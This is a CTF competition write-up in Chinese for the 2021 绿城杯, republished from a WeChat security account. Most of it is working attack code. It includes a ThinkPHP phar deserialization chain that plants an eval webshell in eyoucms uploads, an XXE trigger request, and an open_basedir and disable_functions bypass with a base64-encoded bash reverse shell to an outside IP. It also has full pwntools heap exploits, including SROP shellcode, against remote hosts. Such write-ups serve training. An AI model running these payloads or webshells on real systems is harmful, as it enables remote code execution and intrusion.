2021 绿城杯 wp

admin 2022年1月13日17:38:28CTF专场评论13 views9522字阅读31分44秒阅读模式

点击蓝字 ·  关注我们


01

Web


ezcms

ciscn华东北分区赛awd的链⼦

<?phpnamespace thinkcachedriver { class File { protected $options=null; protected $tag; function __construct(){ $this->options=[ 'expire' => 3600, 'cache_subdir' => false, 'prefix' => '', 'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9SRVFVRVNUWydzdWFudmUnXSk7Pz4g/../uploads/user/4/allimg/20210929/a.php', 'data_compress' => false, ]; $this->tag = 'suanve'; } }}namespace thinksessiondriver{ class SessionHandler{} class Memcached extends SessionHandler{ protected $handler; protected $config = []; function __construct(){ $this->config['session_name'] = 123; $this->config['expire'] = 123;$this->handler = new thinkcachedriverFile(); } }}namespace thinkconsole{ class Output{ protected $styles; private $handle; function __construct(){ $this->styles = array('readAndWrite'); $this->handle = new thinksessiondriverMemcached(); } }}namespace think { class Process { private $processInformation; private $status; private $process; private $processPipes; function __construct(){ $this->status = 'started'; $this->processInformation= array("running"=>true); $this->processPipes = new consoleOutput(); $this->process = 1; } }}namespace { use thinkProcess; // echo base64_encode(serialize(new Process())); @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>'); $o = new Process(); $phar->setMetadata($o); //将⾃定义的meta-data存⼊manifest $phar->addFromString("test.txt", "test"); //添加要压缩的⽂件 //签名⾃动计算 $phar->stopBuffering(); copy("./phar.phar","/Users/su/1.gif");}

⽣成phar⽂件 eyoucms不校验ico后缀的⽂件 所以改名为ico⽂件即可上传,xxe触发phar 通过gitee发现了⼀个xxe的修复 应该可以利⽤。

2021 绿城杯 wp

POST /index.php/home/Index/_initialize HTTP/1.1Host: 0666787d-4b66-4e6e-8d13-55ab438b085f.zzctf.dasctf.comContent-Type: text/xml; charset=utf-8Cache-Control: max-age=0Content-Length: 265<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=phar:///var/www/html/uploads/user/4/allimg/20210929/4-210929141155239.ico" >]><root><name>&xxe;</name></root>

2021 绿城杯 wp

拿到shell发现限

2021 绿城杯 wp

绕过openbasedir

2021 绿城杯 wp

然后使⽤dl绕过disable_function 反弹shell
<?phpini_set('open_basedir',dirname(__FILE__));mkdir('tmp');chdir('tmp');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo "fuck runing";$cmd = '/readflag';$cmd = "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMTk2LjE2NS4xMTUvOTAxIDA+JjE=|base64 -d |bash";$out_path = "/tmp/xxx";$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";putenv("EVIL_CMDLINE=" . $evil_cmdline);$so_path = "/tmp/exp.so";putenv("LD_PRELOAD=" . $so_path);mb_send_mail("", "", "");echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; //var_dump(file_get_contents("/"));
使⽤PATH提权

2021 绿城杯 wp


ezphp

githack获取源码

2021 绿城杯 wp

2021 绿城杯 wp

FLAG DASCTF{ca9efc658d3d96d7f2ccc81733bb4830}

02

Misc


[warmup]⾳频隐写

使⽤audacity打开题⽬,转换成频谱图,拉到最后即可看到flag。

2021 绿城杯 wp

03

Re


easyre

32位exe⽂件,打开之后是魔改的rc4

2021 绿城杯 wp

直接写脚本不好做,可以⽤爆破来爆破每⼀位,python的os库可以调⽤exe

import osb=['Hello, this is my world.If you want flag, give me something I like.n', 'n', 'n', 'n',"sorry!I don't like your stuff."]flag=""c=""for i in range(50): for j in range(32,127): flag=c flag+=chr(j) with open("tt.txt", "w") as f: f.write(flag) os.system("easy_re.exe <tt.txt> flag.txt") with open("flag.txt", "r") as a: data = a.readlines() #print(data) if(data!=b): print(chr(j)) c+=chr(j) break

FLAG flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}

04

Crypto


RSA1

2021 绿城杯 wp


[warmup]加密算法

加密算法是读到字⺟的下标,然后按照 (下标*a+b)%m 的计算⽅式,计算出新的下标,来表示新的字符串。只需要 写⼀个逆操作就好。

from Crypto.Util.number import *cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'def decode(plain_text, a, b, m): flag = '' for j in plain_text: for i in range(len(str1)): if (i*a+b) % m == str1.find(j): flag += str1[i] if j not in str1: flag += j print(flag)decode(cipher_text,37,23,52)# flag{AffInE_CIpheR_iS_clAssiC}
FLAG flag{AffInE_CIpheR_iS_clAssiCx}

05

Pwn


null_pwn

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./null_pwn'#context.arch='amd64'while True : # try : elf=ELF(elfelf) context.arch=elf.arch gdb_text=''' telescope $rebase(0x202040) 16 '''if len(sys.argv)==1 : clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so') io=process(elfelf) # io=process(['./'],env={'LD_PRELOAD':'./'}) clibc.srand(clibc.time(0)) libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247] else : clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so') io=remote('82.157.5.28',51704) clibc.srand(clibc.time(0)) libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247] def choice(a): io.sendlineafter('Your choice :',str(a)) def add(a,c,b): choice(1) io.sendlineafter('Index:',str(a)) io.sendlineafter('Size of Heap : ',str(c)) io.sendafter('Content?:',b)  def edit(a,b): choice(3) io.sendlineafter('Index:',str(a)) io.sendafter('Content?:',b) def show(a): choice(4) io.sendlineafter('Index :',str(a)) def delete(a): choice(2) io.sendlineafter('Index:',str(a)) add(0,0x88,'a') add(1,0x68,'a') add(2,0x68,'a') add(3,0x88,'a') add(4,0xf0,'a') add(5,0xf0,'a') delete(0) show(0) edit(3,'x00'*0x80+p64(0x200)+'x00') delete(4) delete(1) add(0,0xc8,'a'*8)show(0) libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-840-0x10 libc.address=libc_base bin_sh_addr=libc.search('/bin/shx00').next() system_addr=libc.sym['system'] free_hook_addr=libc.sym['__free_hook'] edit(0,'x00'*0x88+p64(0x71)+p64(libc.sym['__malloc_hook']-0x23)+'n') add(1,0x68,'a') add(3,0x68,'a') edit(3,'x00'*0x13+p64(libc_base+one_gadgaet[2])+'n') edit(0,'x00'*0x88+p64(0x1000)+p64(libc.sym['__malloc_hook']-0x23)+'n') delete(1) success('libc_base:'+hex(libc_base)) # success('heap_base:'+hex(heap_base)) # gdb.attach(io,gdb_text) io.interactive() # except Exception as e: # io.close() # continue # else: # continue


uaf

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./uaf_pwn'#context.arch='amd64'while True : # try : elf=ELF(elfelf) context.arch=elf.arch gdb_text=''' telescope $rebase(0x202040) 16 ''' if len(sys.argv)==1 : clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=process(elfelf) # io=process(['./'],env={'LD_PRELOAD':'./'}) clibc.srand(clibc.time(0)) libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247] else : clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so') io=remote('82.157.5.28',50202) clibc.srand(clibc.time(0)) libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247] def choice(a): io.sendlineafter('>',str(a)) def add(c): choice(1) io.sendafter('size>',str(c))  def edit(a,b): choice(3) io.sendlineafter('index>',str(a)) io.sendafter('content>',b) def show(a): choice(4) io.sendlineafter('index>',str(a)) def delete(a): choice(2) io.sendlineafter('index>',str(a)) io.recvuntil('0x') heap_addr=int(io.recv(12),16) add(0x88) add(0x68) add(0x68) delete(0) show(0) libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10 libc.address=libc_base bin_sh_addr=libc.search('/bin/shx00').next() system_addr=libc.sym['system'] free_hook_addr=libc.sym['__free_hook'] delete(1) edit(1,p64(libc.sym['__malloc_hook']-0x23))add(0x68) add(0x68) edit(4,'x00'*0x13+p64(one_gadgaet[2]+libc_base)) delete(1) delete(1) success('libc_base:'+hex(libc_base)) # success('heap_base:'+hex(heap_base)) # gdb.attach(io,gdb_text) io.interactive() # except Exception as e: # io.close() # continue # else: # continue


GreentownNote

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./GreentownNote'#context.arch='amd64'while True : # try : elf=ELF(elfelf) context.arch=elf.arch gdb_text=''' telescope $rebase(0x202040) 16 '''if len(sys.argv)==1 : clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so') io=process(elfelf) # io=process(['./'],env={'LD_PRELOAD':'./'}) clibc.srand(clibc.time(0)) libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247] else : clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so') io=remote('82.157.5.28',51701) clibc.srand(clibc.time(0)) libc=ELF('./libc-2.27.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247] def choice(a): io.sendlineafter('Your choice :',str(a)) def add(b,c): choice(1) io.sendlineafter(':',str(b)) io.sendafter(':',str(c)) def show(a): choice(2) io.sendlineafter(':',str(a)) def delete(a): choice(3) io.sendlineafter(':',str(a)) add(0x88,'a') add(0x88,'a') for i in range(7): delete(1) delete(0) show(0) libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-0x10 libc.address=libc_base bin_sh_addr=libc.search('/bin/shx00').next() system_addr=libc.sym['system'] free_hook_addr=libc.sym['__free_hook'] add(0x88,p64(free_hook_addr)) add(0x88,p64(free_hook_addr)) new_shell_code_head_addr=free_hook_addr&0xfffffffffffff000shell1=''' xor rdi,rdi mov rsi,%d mov rdx,0x1000 xor rax,rax syscall jmp rsi '''%new_shell_code_head_addr pay=p64(libc.sym['setcontext']+53)+p64(free_hook_addr+0x10)+asm(shell1) add(0x88,pay) srop_mprotect=SigreturnFrame() srop_mprotect.rsp=free_hook_addr+0x8 srop_mprotect.rdi=new_shell_code_head_addr srop_mprotect.rsi=0x1000 srop_mprotect.rdx=4|2|1 srop_mprotect.rip=libc.sym['mprotect'] add(0x200,str(srop_mprotect)) # gdb.attach(io,gdb_text) delete(3) shell2=''' mov rax,0x67616c662f2e push rax mov rdi,rsp mov rsi,0x0 xor rdx,rdx mov rax,0x2 syscall mov rdi,rax mov rsi,rsp mov rdx,0x100 mov rax,0x0 syscall mov rdi,0x1 mov rsi,rsp mov rdx,0x100 mov rax,0x1 syscall ''' io.sendline(asm(shell2))  # success('libc_base:'+hex(libc_base)) # success('heap_base:'+hex(heap_base))  # gdb.attach(io,gdb_text) io.interactive() # except Exception as e:# io.close() # continue # else: # continue

EDI安全

2021 绿城杯 wp

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

原文始发于微信公众号(EDI安全):2021 绿城杯 wp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月13日17:38:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  2021 绿城杯 wp https://cn-sec.com/archives/567136.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: